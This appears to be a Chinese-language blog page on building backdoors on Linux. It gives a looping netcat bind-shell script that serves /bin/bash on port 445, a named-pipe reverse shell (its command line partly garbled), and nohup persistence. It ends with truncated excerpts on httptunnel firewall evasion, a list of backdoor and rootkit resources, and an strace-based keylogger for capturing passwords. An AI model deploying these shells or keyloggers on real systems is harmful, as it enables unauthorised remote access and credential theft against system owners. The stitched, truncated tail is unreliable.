在linux下建立後門方式一
預設情況下 gnu netcat 不支援持續性監聽操作。每一次accept並執行完命令之後,netcat就會斷開連線。如果需要讓 netcat 保持持續性監聽狀態,就必須使用迴圈語句不斷的開啟新的監聽模式。
listener.sh 監聽指令碼
#!/bin/bash
while [ 1 ]; do
echo -n | netcat -l -v -p 445
-e /bin/bash
done
但也許是出於安全考慮,發行版中預設編譯的nc往往沒有-e選項
(沒有define乙個gaping_security_hole常量),
也就是說我們不能通過-e選項繫結目標的shell,使得我們在利用上受到限制,但這種情況下是不是就沒辦法利用了呢?天無絕人之路,來看下面的tip。
在attack這邊依然用nc -lnvp listenport監聽某埠,在目標環境中依次執行以下命令:
root@bt
:~#mknod /tmp/backpipe p
root@bt
:~#/bin/sh 0/tmp/backpipe
建立持續性的netcat後門
保持程式後台執行的正確方法
nohup 命令 &後台執行監聽指令碼: nohup ./listener.sh &Linux下的後門和日誌工具
1 從這裡延伸 後門和連線工具 tunnel的意思是隧道,通常httptunnel被稱之為http暗道,它的原理就是將資料偽裝成http的資料形式來穿過防火牆,實際上,它是在http請求中建立了乙個雙向的虛擬資料連線來穿透防火牆。說得簡單點,就是說在防火牆兩邊都設立乙個轉換程式,將原來需要傳送或接受...
linux後門收集
gmail註冊可用,root許可權 安全脈搏 後門利用方法 後門檢測及其清除方法 linux常見backdoor及排查技術 建立軟鏈結,使用任意密碼ssh登入 另一種拿到root許可權的時候想遠端訪問的方法 一些後門的分類及示例原始碼 烏雲medium上的 linux的rootkit的簡介及及其檢測...
linux後門之strace後門鍵盤記錄
strace是乙個動態跟蹤工具,它可以跟蹤系統呼叫的執行。我們可以把他當成乙個鍵盤記錄的後門,來擴大我們的資訊收集範圍 通過其他方式拿到shell,通過history 流量抓包 或者本地沒有翻到密碼的情況。我們想要獲取當前主機的密碼,或者通過這台主機連線到其他主機的密碼。執行如下命令 strace ...